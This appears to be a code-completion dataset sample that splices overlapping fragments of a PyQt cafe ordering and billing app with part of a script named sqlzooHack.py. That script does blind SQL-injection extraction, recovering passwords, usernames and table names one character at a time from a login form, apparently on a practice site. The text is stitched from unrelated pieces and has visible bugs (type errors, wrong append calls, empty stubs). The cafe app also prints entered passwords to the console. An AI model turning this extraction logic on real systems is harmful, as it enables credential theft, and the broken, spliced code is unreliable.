"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:8.25pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>"))
self.addTable.setText(_translate("Dialog", "Add Table"))
self.loginBox.setTitle(_translate("Dialog", "GroupBox"))
self.userLbl.setText(_translate("Dialog", "User:"))
self.loginBtn.setText(_translate("Dialog", "Login"))
self.passLbl.setText(_translate("Dialog", "Pass:"))
self.orderButton.setText(_translate("Dialog", "Order"))
self.loadBackupFile.setText(_translate("Dialog", "Load Backup"))
def addItemFunction(self):
self.addItemWindow = Ui_MainWindow()
self.itemWindow = QtWidgets.QMainWindow()
self.addItemWindow.setupUi(self.itemWindow)
self.itemWindow.setWindowIcon(QtGui.QIcon('sushi.jpg'))
self.buttonBox = QtWidgets.QDialogButtonBox(self.addItemWindow.centralwidget)
self.buttonBox.setGeometry(QtCore.QRect(620, 560, 251, 41))
font = QtGui.QFont()
font.setPointSize(12)
self.buttonBox.setFont(font)
self.buttonBox.setToolTipDuration(4)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.accepted.connect(self.okButtonClick)
self.buttonBox.rejected.connect(self.cancelButtonClick)
self.buttonBox.setObjectName("buttonBox")
self.itemWindow.show()
def okButtonClick(self):
for item in self.addItemWindow.spinBoxList:
if(str(item.value())!= "0"):
printOut = str(item.value())+" x "+item.objectName()
self.itemDataBase[self.tableDrop.currentText()].append(printOut)
#self.showItem.append(printOut)
self.itemWindow.close()
self.showItem.clear()
for item in self.itemDataBase[self.tableDrop.currentText()]:
self.showItem.append(item.split(".")[0])
self.writeBackupFile()
def cancelButtonClick(self):
self.itemWindow.close()
def addTableFunction(self):
currentKeyNumber = len(self.itemDataBase.keys())
self.tableDrop.addItem(str(currentKeyNumber))
self.itemDataBase[str(currentKeyNumber)] = ["Table Number "+str(currentKeyNumber)]
def loadTableItem(self):
self.showItem.clear()
for item in self.itemDataBase[self.tableDrop.currentText()]:
self.showItem.append(item)
def loginFunction(self):
try:
user = self.inputUser.text()
print("user : " + user)
pwd = self.inputPwd.text()
print("pwd : " + pwd)
except:
print("Missing Input!")
self.msgWrong.exec_()
pass
try:
if(self.loginDatabase[user] == pwd):
print("Login Successful!")
self.msgCorrect.exec_()
self.adminRight = True
self.loadBackupFile.setEnabled(True)
self.addTable.setEnabled(True)
else:
self.msgWrong.exec_()
except:
print("Wrong password! ")
self.msgWrong.exec_()
def writeBackupFile(self):
timestr = time.strftime("%Y%m%d-%H%M%S")
with open("backup/"+timestr+'.json', 'w') as backupFile:
json.dump(self.itemDataBase,backupFile)
def loadBackupFunction(self):
try:
filename = QFileDialog.getOpenFileName()
path = filename[0]
with open(path, "r") as f:
|
random_line_split
|
|
app.py
|
.noteBtn.setEnabled(False)
self.addItemBtn = QtWidgets.QPushButton(self.itemBox)
self.addItemBtn.setGeometry(QtCore.QRect(290, 50, 75, 23))
self.addItemBtn.setObjectName("addItemBtn")
self.addItemBtn.clicked.connect(self.addItemFunction)
self.tableList = [i for i in range(21)]
self.tableDrop = QtWidgets.QComboBox(self.itemBox)
self.tableDrop.setGeometry(QtCore.QRect(200, 20, 69, 22))
self.tableDrop.setObjectName("tableDrop")
for table in self.tableList:
self.tableDrop.addItem(str(table))
self.itemDataBase[str(table)] = ["Table Number "+str(table)]
self.tableDrop.activated.connect(self.loadTableItem)
self.tableNoLbl = QtWidgets.QLabel(self.itemBox)
self.tableNoLbl.setGeometry(QtCore.QRect(120, 10, 131, 41))
self.tableNoLbl.setObjectName("tableNoLbl")
self.addTable = QtWidgets.QPushButton(self.itemBox)
self.addTable.setGeometry(QtCore.QRect(10, 20, 75, 23))
self.addTable.setObjectName("AddTable")
self.addTable.clicked.connect(self.addTableFunction)
self.addTable.setEnabled(False)
self.showItem = QtWidgets.QTextEdit(self.itemBox)
self.showItem.setGeometry(QtCore.QRect(10, 50, 261, 231))
self.showItem.setObjectName("showItem")
self.showItem.setReadOnly(True)
self.orderButton = QtWidgets.QPushButton(self.itemBox)
self.orderButton.setGeometry(QtCore.QRect(290, 110, 75, 23))
self.orderButton.setObjectName("orderButton")
self.orderButton.clicked.connect(self.orderFunction)
self.orderButton.setEnabled(False)
self.loadBackupFile = QtWidgets.QPushButton(self.itemBox)
self.loadBackupFile.setGeometry(QtCore.QRect(290, 20, 75, 23))
self.loadBackupFile.setObjectName("loadBackupFile")
self.loadBackupFile.clicked.connect(self.loadBackupFunction)
self.loadBackupFile.setEnabled(False)
self.loginBox = QtWidgets.QGroupBox(Dialog)
self.loginBox.setGeometry(QtCore.QRect(10, 10, 381, 81))
self.loginBox.setObjectName("loginBox")
self.userLbl = QtWidgets.QLabel(self.loginBox)
self.userLbl.setGeometry(QtCore.QRect(10, 20, 47, 21))
font = QtGui.QFont()
font.setPointSize(14)
self.userLbl.setFont(font)
self.userLbl.setObjectName("userLbl")
self.inputUser = QtWidgets.QLineEdit(self.loginBox)
self.inputUser.setGeometry(QtCore.QRect(70, 20, 201, 21))
self.inputUser.setObjectName("inputUser")
self.loginBtn = QtWidgets.QPushButton(self.loginBox)
self.loginBtn.setGeometry(QtCore.QRect(290, 20, 75, 23))
self.loginBtn.setObjectName("loginBtn")
self.loginBtn.clicked.connect(self.loginFunction)
self.inputPwd = QtWidgets.QLineEdit(self.loginBox)
self.inputPwd.setGeometry(QtCore.QRect(70, 50, 201, 21))
self.inputPwd.setObjectName("inputPwd")
self.inputPwd.setEchoMode(QtWidgets.QLineEdit.Password)
self.passLbl = QtWidgets.QLabel(self.loginBox)
self.passLbl.setGeometry(QtCore.QRect(10, 50, 47, 21))
font = QtGui.QFont()
font.setPointSize(14)
self.passLbl.setFont(font)
self.passLbl.setObjectName("passLbl")
self.msgWrong = QMessageBox()
self.msgWrong.setWindowTitle("Login Check")
self.msgWrong.setText("Wrong user/password!")
self.msgWrong.setIcon(QMessageBox.Critical)
self.msgCorrect = QMessageBox()
self.msgCorrect.setWindowTitle("Login Check")
self.msgCorrect.setText(" Login Successful!")
self.msgCorrect.setIcon(QMessageBox.Information)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
self.removeOldBackupFile()
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.itemBox.setTitle(_translate("Dialog", "GroupBox"))
self.checkOutBtn.setText(_translate("Dialog", "Check out"))
self.noteBtn.setText(_translate("Dialog", "Note"))
self.addItemBtn.setText(_translate("Dialog", "Add Items"))
self.tableDrop.setItemText(0, _translate("Dialog", "1"))
self.tableDrop.setItemText(1, _translate("Dialog", "2"))
self.tableDrop.setItemText(2, _translate("Dialog", "3"))
self.tableNoLbl.setText(_translate("Dialog", "Table Number"))
self.showItem.setHtml(_translate("Dialog", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:8.25pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>"))
self.addTable.setText(_translate("Dialog", "Add Table"))
self.loginBox.setTitle(_translate("Dialog", "GroupBox"))
self.userLbl.setText(_translate("Dialog", "User:"))
self.loginBtn.setText(_translate("Dialog", "Login"))
self.passLbl.setText(_translate("Dialog", "Pass:"))
self.orderButton.setText(_translate("Dialog", "Order"))
self.loadBackupFile.setText(_translate("Dialog", "Load Backup"))
def addItemFunction(self):
self.addItemWindow = Ui_MainWindow()
self.itemWindow = QtWidgets.QMainWindow()
self.addItemWindow.setupUi(self.itemWindow)
self.itemWindow.setWindowIcon(QtGui.QIcon('sushi.jpg'))
self.buttonBox = QtWidgets.QDialogButtonBox(self.addItemWindow.centralwidget)
self.buttonBox.setGeometry(QtCore.QRect(620, 560, 251, 41))
font = QtGui.QFont()
font.setPointSize(12)
self.buttonBox.setFont(font)
self.buttonBox.setToolTipDuration(4)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.accepted.connect(self.okButtonClick)
self.buttonBox.rejected.connect(self.cancelButtonClick)
self.buttonBox.setObjectName("buttonBox")
self.itemWindow.show()
def okButtonClick(self):
for item in self.addItemWindow.spinBoxList:
if(str(item.value())!= "0"):
printOut = str(item.value())+" x "+item.objectName()
self.itemDataBase[self.tableDrop.currentText()].append(printOut)
#self.showItem.append(printOut)
self.itemWindow.close()
self.showItem.clear()
for item in self.itemDataBase[self.tableDrop.currentText()]:
self.showItem.append(item.split(".")[0])
self.writeBackupFile()
def cancelButtonClick(self):
self.itemWindow.close()
def addTableFunction(self):
currentKeyNumber = len(self.itemDataBase.keys())
self.tableDrop.addItem(str(currentKeyNumber))
self.itemDataBase[str(currentKeyNumber)] = ["Table Number "+str(currentKeyNumber)]
def loadTableItem(self):
self.showItem.clear()
for item in self.itemDataBase[self.tableDrop.currentText()]:
self.showItem.append(item)
def loginFunction(self):
try:
user = self.inputUser.text()
print("user : " + user)
pwd = self.inputPwd.text()
print("pwd : " + pwd)
except:
print("Missing Input!")
self.msgWrong.exec_()
pass
try:
if(self.loginDatabase[user] == pwd):
print("Login Successful!")
self.msgCorrect.exec_()
self.adminRight = True
self.loadBackupFile.setEnabled(True)
self.addTable.setEnabled(True)
else:
self.msgWrong.exec_()
except:
print("Wrong password! ")
self.msgWrong.exec_()
def writeBackupFile(self):
timestr = time.strftime("%Y%m%d-%H%M%S")
with open("backup/"+timestr+'.json', 'w') as backupFile:
json.dump(self.itemDataBase,backupFile)
def loadBackupFunction(self):
try:
filename = QFileDialog.getOpenFileName()
path = filename[0]
with open(path, "r") as f:
self.itemDataBase.clear()
self.itemDataBase = json.load(f)
self.loadTableItem()
except:
print("Can't Open Backup Folder!")
pass
def removeOldBackupFile(self):
currentMonthStr = time.strftime("%m")
folder = os.fsencode("backup")
try:
for file in os.listdir(folder):
|
filename = os.fsdecode(file)
if filename.endswith('.json') and filename[4:6] != currentMonthStr:
os.remove("backup/"+filename)
|
conditional_block
|
|
app.py
|
self.userLbl.setText(_translate("Dialog", "User:"))
self.loginBtn.setText(_translate("Dialog", "Login"))
self.passLbl.setText(_translate("Dialog", "Pass:"))
self.orderButton.setText(_translate("Dialog", "Order"))
self.loadBackupFile.setText(_translate("Dialog", "Load Backup"))
def addItemFunction(self):
self.addItemWindow = Ui_MainWindow()
self.itemWindow = QtWidgets.QMainWindow()
self.addItemWindow.setupUi(self.itemWindow)
self.itemWindow.setWindowIcon(QtGui.QIcon('sushi.jpg'))
self.buttonBox = QtWidgets.QDialogButtonBox(self.addItemWindow.centralwidget)
self.buttonBox.setGeometry(QtCore.QRect(620, 560, 251, 41))
font = QtGui.QFont()
font.setPointSize(12)
self.buttonBox.setFont(font)
self.buttonBox.setToolTipDuration(4)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.accepted.connect(self.okButtonClick)
self.buttonBox.rejected.connect(self.cancelButtonClick)
self.buttonBox.setObjectName("buttonBox")
self.itemWindow.show()
def okButtonClick(self):
for item in self.addItemWindow.spinBoxList:
if(str(item.value())!= "0"):
printOut = str(item.value())+" x "+item.objectName()
self.itemDataBase[self.tableDrop.currentText()].append(printOut)
#self.showItem.append(printOut)
self.itemWindow.close()
self.showItem.clear()
for item in self.itemDataBase[self.tableDrop.currentText()]:
self.showItem.append(item.split(".")[0])
self.writeBackupFile()
def cancelButtonClick(self):
self.itemWindow.close()
def addTableFunction(self):
currentKeyNumber = len(self.itemDataBase.keys())
self.tableDrop.addItem(str(currentKeyNumber))
self.itemDataBase[str(currentKeyNumber)] = ["Table Number "+str(currentKeyNumber)]
def loadTableItem(self):
self.showItem.clear()
for item in self.itemDataBase[self.tableDrop.currentText()]:
self.showItem.append(item)
def loginFunction(self):
try:
user = self.inputUser.text()
print("user : " + user)
pwd = self.inputPwd.text()
print("pwd : " + pwd)
except:
print("Missing Input!")
self.msgWrong.exec_()
pass
try:
if(self.loginDatabase[user] == pwd):
print("Login Successful!")
self.msgCorrect.exec_()
self.adminRight = True
self.loadBackupFile.setEnabled(True)
self.addTable.setEnabled(True)
else:
self.msgWrong.exec_()
except:
print("Wrong password! ")
self.msgWrong.exec_()
def writeBackupFile(self):
timestr = time.strftime("%Y%m%d-%H%M%S")
with open("backup/"+timestr+'.json', 'w') as backupFile:
json.dump(self.itemDataBase,backupFile)
def loadBackupFunction(self):
try:
filename = QFileDialog.getOpenFileName()
path = filename[0]
with open(path, "r") as f:
self.itemDataBase.clear()
self.itemDataBase = json.load(f)
self.loadTableItem()
except:
print("Can't Open Backup Folder!")
pass
def removeOldBackupFile(self):
currentMonthStr = time.strftime("%m")
folder = os.fsencode("backup")
try:
for file in os.listdir(folder):
filename = os.fsdecode(file)
if filename.endswith('.json') and filename[4:6] != currentMonthStr:
os.remove("backup/"+filename)
except:
print("Missing Backup Folder !")
print("Creating Backup Folder ...")
os.mkdir("backup")
def showNotAuthorize(self):
notAdmin = QMessageBox()
notAdmin.setWindowTitle("Login Check")
notAdmin.setText("Not Authorized! Please Login!")
notAdmin.setIcon(QMessageBox.Critical)
notAdmin.exec_()
def checkOutFunction(self):
stringToPrint = self.getPriceFromItem()
print(stringToPrint)
self.showItem.clear()
self.itemDataBase[self.tableDrop.currentText()].clear()
self.itemDataBase[self.tableDrop.currentText()] = ["Table Number "+ self.tableDrop.currentText()]
self.showItem.append("Table Number "+ self.tableDrop.currentText())
self.callPrinterToPrint(stringToPrint)
def getPriceFromItem(self):
temp = self.itemDataBase[self.tableDrop.currentText()].pop(0)
totalPrice = 0
tempDateTime = time.strftime("%d-%m-%Y %H:%M Id: ")
tempBillId = time.strftime("%m%d%H%M%S")
tempString = """An nhiên Cafe by Bảo Châu
Address: 09 Phạm Thái Bường (Liên Xã) Thị xã Hoà Thành, TP. Tây Ninh\n\n"""+tempDateTime +tempBillId+ "\n\n"
tempString+= "Bill of Table " + self.tableDrop.currentText() + "\n\n"
for item in self.itemDataBase[self.tableDrop.currentText()]:
quantity = item.split(" x ")[0]
name = item.split(" x ")[1].split(".")[0]
priceOfOne = priceList[name]
priceActual = priceOfOne*int(quantity)
totalPrice += priceActual
##print(item.split(".")[0] + " = " + str(price))
tempString += item.split(".")[0] + " = %s vnd\n" % ("{:,.0f}".format(int(priceActual)))
tempString += """============================
\t\tTotal: {:>1,.0f} vnd""".format(int(totalPrice))
return tempString
def callPrinterToPrint(self,stringToPrint):
document = docx.Document()
margin = 5
sections = document.sections
for section in sections:
section.page_height = Mm(210)
section.page_width = Mm(72)
section.top_margin = Mm(margin)
section.bottom_margin = Mm(margin)
section.left_margin = Mm(margin)
section.right_margin = Mm(margin)
document.add_paragraph(stringToPrint)
document.save("testdoc.docx")
try:
print("Start printing...")
os.startfile("testdoc.docx", "print")
time.sleep(1)
os.startfile("testdoc.docx", "print")
time.sleep(1)
print("Done!")
except Exception as e:
print(str(e))
print("--Failed to print--")
time.sleep(2)
def orderFunction(self):
stringToPrint = self.getPriceFromItem()
print(stringToPrint)
self.callPrinterToPrint(stringToPrint)
# def callPrinterToPrint(self,stringToPrint):
# filename = "test.txt"
# name = win32print.GetDefaultPrinter()
# printdefaults = {"DesiredAccess": win32print.PRINTER_ALL_ACCESS}
# handle = win32print.OpenPrinter(name, printdefaults)
# level = 2
# # retrieve default settings. this code does not work on
# attributes = win32print.GetPrinter(handle ,level)
# attributes["pDevMode"].PaperSize = 0
# attributes["pDevMode"].PaperLength = 21
# attributes["pDevMode"].PaperWidth = 7.21
# attributes["pDevMode"].Position_x = 1
# attributes["pDevMode"].Position_y = 1
# attributes["pDevMode"].PelsWidth = 1
# attributes["pDevMode"].PelsHeight = 1
# attributes["pDevMode"].DisplayFixedOutput = DisplayFixedOutput =2
# try:
# win32print.SetPrinter(handle, level, attributes, 0)
# except:
# print("win32print.SetPrinter: settings could not be changed")
# try:
# with codecs.getwriter('utf_8') (open (filename, "wb")) as file:
# file.write(stringToPrint)
# Print2Copies = win32api.ShellExecute(0, 'print', filename, None, '.', 0)
# time.sleep(1)
# Print2Copies
# # hdc = win32gui.CreateDC('', printer_name, attributes)
# # win32print.StartDoc(hdc, ('Test', "test.txt", None, 0))
# # win32print.StartPage(hdc)
# # win32print.EndPage(hdc)
# # win32print.EndDoc(hdc)
# print("Printing now...")
# win32print.ClosePrinter(handle)
# print("Done")
# except Exception as e:
# print(str(e))
# print("--Failed to print--")
# time.sleep(5)
# def closeEvent(self, event):
# close = QtWidgets.QMessageBox.question(self,
# "QUIT",
# "Are you sure want to stop process?",
# QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
# if close == QtWidgets.QMessageBox.Yes:
# event.accept()
# else:
# event.ignore()
def main():
app =
|
QApp
|
identifier_name
|
|
app.py
|
self.checkOutBtn = QtWidgets.QPushButton(self.itemBox)
self.checkOutBtn.setGeometry(QtCore.QRect(290, 140, 75, 23))
self.checkOutBtn.setObjectName("checkOutBtn")
self.checkOutBtn.clicked.connect(self.checkOutFunction)
self.noteBtn = QtWidgets.QPushButton(self.itemBox)
self.noteBtn.setGeometry(QtCore.QRect(290, 80, 75, 23))
self.noteBtn.setObjectName("noteBtn")
self.noteBtn.setEnabled(False)
self.addItemBtn = QtWidgets.QPushButton(self.itemBox)
self.addItemBtn.setGeometry(QtCore.QRect(290, 50, 75, 23))
self.addItemBtn.setObjectName("addItemBtn")
self.addItemBtn.clicked.connect(self.addItemFunction)
self.tableList = [i for i in range(21)]
self.tableDrop = QtWidgets.QComboBox(self.itemBox)
self.tableDrop.setGeometry(QtCore.QRect(200, 20, 69, 22))
self.tableDrop.setObjectName("tableDrop")
for table in self.tableList:
self.tableDrop.addItem(str(table))
self.itemDataBase[str(table)] = ["Table Number "+str(table)]
self.tableDrop.activated.connect(self.loadTableItem)
self.tableNoLbl = QtWidgets.QLabel(self.itemBox)
self.tableNoLbl.setGeometry(QtCore.QRect(120, 10, 131, 41))
self.tableNoLbl.setObjectName("tableNoLbl")
self.addTable = QtWidgets.QPushButton(self.itemBox)
self.addTable.setGeometry(QtCore.QRect(10, 20, 75, 23))
self.addTable.setObjectName("AddTable")
self.addTable.clicked.connect(self.addTableFunction)
self.addTable.setEnabled(False)
self.showItem = QtWidgets.QTextEdit(self.itemBox)
self.showItem.setGeometry(QtCore.QRect(10, 50, 261, 231))
self.showItem.setObjectName("showItem")
self.showItem.setReadOnly(True)
self.orderButton = QtWidgets.QPushButton(self.itemBox)
self.orderButton.setGeometry(QtCore.QRect(290, 110, 75, 23))
self.orderButton.setObjectName("orderButton")
self.orderButton.clicked.connect(self.orderFunction)
self.orderButton.setEnabled(False)
self.loadBackupFile = QtWidgets.QPushButton(self.itemBox)
self.loadBackupFile.setGeometry(QtCore.QRect(290, 20, 75, 23))
self.loadBackupFile.setObjectName("loadBackupFile")
self.loadBackupFile.clicked.connect(self.loadBackupFunction)
self.loadBackupFile.setEnabled(False)
self.loginBox = QtWidgets.QGroupBox(Dialog)
self.loginBox.setGeometry(QtCore.QRect(10, 10, 381, 81))
self.loginBox.setObjectName("loginBox")
self.userLbl = QtWidgets.QLabel(self.loginBox)
self.userLbl.setGeometry(QtCore.QRect(10, 20, 47, 21))
font = QtGui.QFont()
font.setPointSize(14)
self.userLbl.setFont(font)
self.userLbl.setObjectName("userLbl")
self.inputUser = QtWidgets.QLineEdit(self.loginBox)
self.inputUser.setGeometry(QtCore.QRect(70, 20, 201, 21))
self.inputUser.setObjectName("inputUser")
self.loginBtn = QtWidgets.QPushButton(self.loginBox)
self.loginBtn.setGeometry(QtCore.QRect(290, 20, 75, 23))
self.loginBtn.setObjectName("loginBtn")
self.loginBtn.clicked.connect(self.loginFunction)
self.inputPwd = QtWidgets.QLineEdit(self.loginBox)
self.inputPwd.setGeometry(QtCore.QRect(70, 50, 201, 21))
self.inputPwd.setObjectName("inputPwd")
self.inputPwd.setEchoMode(QtWidgets.QLineEdit.Password)
self.passLbl = QtWidgets.QLabel(self.loginBox)
self.passLbl.setGeometry(QtCore.QRect(10, 50, 47, 21))
font = QtGui.QFont()
font.setPointSize(14)
self.passLbl.setFont(font)
self.passLbl.setObjectName("passLbl")
self.msgWrong = QMessageBox()
self.msgWrong.setWindowTitle("Login Check")
self.msgWrong.setText("Wrong user/password!")
self.msgWrong.setIcon(QMessageBox.Critical)
self.msgCorrect = QMessageBox()
self.msgCorrect.setWindowTitle("Login Check")
self.msgCorrect.setText(" Login Successful!")
self.msgCorrect.setIcon(QMessageBox.Information)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
self.removeOldBackupFile()
def retranslateUi(self, Dialog):
|
self.orderButton.setText(_translate("Dialog", "Order"))
self.loadBackupFile.setText(_translate("Dialog", "Load Backup"))
def addItemFunction(self):
self.addItemWindow = Ui_MainWindow()
self.itemWindow = QtWidgets.QMainWindow()
self.addItemWindow.setupUi(self.itemWindow)
self.itemWindow.setWindowIcon(QtGui.QIcon('sushi.jpg'))
self.buttonBox = QtWidgets.QDialogButtonBox(self.addItemWindow.centralwidget)
self.buttonBox.setGeometry(QtCore.QRect(620, 560, 251, 41))
font = QtGui.QFont()
font.setPointSize(12)
self.buttonBox.setFont(font)
self.buttonBox.setToolTipDuration(4)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.accepted.connect(self.okButtonClick)
self.buttonBox.rejected.connect(self.cancelButtonClick)
self.buttonBox.setObjectName("buttonBox")
self.itemWindow.show()
def okButtonClick(self):
for item in self.addItemWindow.spinBoxList:
if(str(item.value())!= "0"):
printOut = str(item.value())+" x "+item.objectName()
self.itemDataBase[self.tableDrop.currentText()].append(printOut)
#self.showItem.append(printOut)
self.itemWindow.close()
self.showItem.clear()
for item in self.itemDataBase[self.tableDrop.currentText()]:
self.showItem.append(item.split(".")[0])
self.writeBackupFile()
def cancelButtonClick(self):
self.itemWindow.close()
def addTableFunction(self):
currentKeyNumber = len(self.itemDataBase.keys())
self.tableDrop.addItem(str(currentKeyNumber))
self.itemDataBase[str(currentKeyNumber)] = ["Table Number "+str(currentKeyNumber)]
def loadTableItem(self):
self.showItem.clear()
for item in self.itemDataBase[self.tableDrop.currentText()]:
self.showItem.append(item)
def loginFunction(self):
try:
user = self.inputUser.text()
print("user : " + user)
pwd = self.inputPwd.text()
print("pwd : " + pwd)
except:
print("Missing Input!")
self.msgWrong.exec_()
pass
try:
if(self.loginDatabase[user] == pwd):
print("Login Successful!")
self.msgCorrect.exec_()
self.adminRight = True
self.loadBackupFile.setEnabled(True)
self.addTable.setEnabled(True)
else:
self.msgWrong.exec_()
except:
print("Wrong password! ")
self.msgWrong.exec_()
def writeBackupFile(self):
timestr = time.strftime("%Y%m%d-%H%M%S")
with open("backup/"+timestr+'.json', 'w') as backupFile:
json.dump(self.itemDataBase,backupFile)
def loadBackupFunction(self):
try:
filename = QFileDialog.getOpenFileName()
path = filename[0]
with open(path, "r") as f:
self
|
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.itemBox.setTitle(_translate("Dialog", "GroupBox"))
self.checkOutBtn.setText(_translate("Dialog", "Check out"))
self.noteBtn.setText(_translate("Dialog", "Note"))
self.addItemBtn.setText(_translate("Dialog", "Add Items"))
self.tableDrop.setItemText(0, _translate("Dialog", "1"))
self.tableDrop.setItemText(1, _translate("Dialog", "2"))
self.tableDrop.setItemText(2, _translate("Dialog", "3"))
self.tableNoLbl.setText(_translate("Dialog", "Table Number"))
self.showItem.setHtml(_translate("Dialog", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:8.25pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>"))
self.addTable.setText(_translate("Dialog", "Add Table"))
self.loginBox.setTitle(_translate("Dialog", "GroupBox"))
self.userLbl.setText(_translate("Dialog", "User:"))
self.loginBtn.setText(_translate("Dialog", "Login"))
self.passLbl.setText(_translate("Dialog", "Pass:"))
|
identifier_body
|
sqlzooHack.py
|
the charList (wildCards is True), _ will be substituted in since it matches every single character.
otherwise, if no characters match, that character will be skipped, and it's index is printed (e.g. Missing: 6)
Raises:
TypeError: exception
raised with ValueErrors when findChar returns i instead of an element of CharList
ValueError: exception
raised when no character in charList is correct.
https://stackoverflow.com/questions/2052390/manually-raising-throwing-an-exception-in-python
Note: not working as hoped. Perhaps I need to change the other functions to always return a str? Maybe a place holder string like _ for now?
"""
# dikt = {}
password = ""
for i in range(0, n):
if(testPassword(password, username, url)):
return password #password is found!
# https://stackoverflow.com/questions/189645/how-to-break-out-of-multiple-loops-in-python
ch = findChar(username, url, charList, i)
# if(isinstance(ch, int))#if ch is int i, can't find a matching character at index i in password string
# use try except instead of if(isinstance(ch, int)):
# https://stackoverflow.com/questions/3501382/checking-whether-a-variable-is-an-integer-or-not
try:
password += ch
except TypeError:
# print(i)
password += str(ch) #should be blank
# raise ValueError("index i has no matching character")
return password #only reached if password is too long for the given n
def findChar(username, url, charList, i):
"""helper function for checkPass
returns the first element of charList found that works for the password at index i
if it fails to find a character at i, prints i and returns an empty string instead of returning i.
"""
for ch in charList:
if(checkPasswordCharacter(ch, username, url, index = i)):
return ch
#only runs if no ch in charList match:
# return i #oof, there's no match if i is out of bounds, e.g. len(password) < i
print("Missing: " + i) #so I know when it's not a match
return "" #return an empty string instead
# Note to self: should not return an _ because it'll match an _ if wildCards are true (default).
# If wildCards is false, this will just skip characters that don't match anything!
"""
Strategy:
if findChar returns i - meaning checkPass will print i then raise a type and a value error -
then perhaps check all unicode characters for the password at index i and add the one that works to the charaters checked and rerun the script
"""
def makeTableList(url, caseSensitive = False, wildCards = True):
|
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in numbers:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in special:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in other:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
if(caseSensitive):
for ch in upper:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch, url)
if(wildCards):
for ch in wildCards:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch, url)
return charList
def makeDatabaseList():
""" List of characters in database names
Args:
url: String
form url
caseSensitive: Boolean
default False
true if case sentitivity matters
wildCards: Boolean
default True
true if wildcards should be placed where no other characters match
Returns:
lst: List
list of characters in table names
"""
charList = []
for ch in lower:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in numbers:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in special:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in other:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
if(caseSensitive):
for ch in upper:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch, url)
if(wildCards):
for ch in wildCards:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch, url)
return charList
def makeTableNamesList(n, ):
""" List of table names
Args:
n: integer
max number of table names to return
Returns:
lst: list
list of up to n table names
"""
def tableName(lst, ):
name = ""
for i in range(0, n):
for ch in lst:
if(characterInTableName(ch, url, i)):
name += ch
else:
name += "" #should only be reached if wildcards are false
return name
def makeDatabaseNamesList(n, ):
""" List of database names
Args:
n: integer
max number of table names to return
Returns:
lst: list
list of up to n database names
"""
def makeListF(f, url, *argsf, caseSensitive = False, wildCards = True):
"""makeList generalized to use the boolean function f.
Args:
argsf: list
sole list argument of the function f.
Returns:
lst: list of valid characters as determined by the boolean function f
"""
def userNameCharacters(url, tableName, caseSensitive = False, wildCards = True):
""" returns list of characters that appear in any username
"""
"""
sqlzoo characters
['a', 'c', 'd', 'e', 'h', 'i', 'j', 'k', 'n', 'o', 'p', 'r', 't', 'w', '_', '%']
"""
lst = []
for ch in special:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in lower:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in numbers:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in other:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
if(caseSensitive):
for ch in upper:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
if(wildCards):
for ch in wildcards:
lst.append(ch) #it'll match if there's users
return lst
def userLists(n, tableName, url, characterList):
"""
Assumption: usernames are unique.
Args:
n: integer
max password length
tableName: string
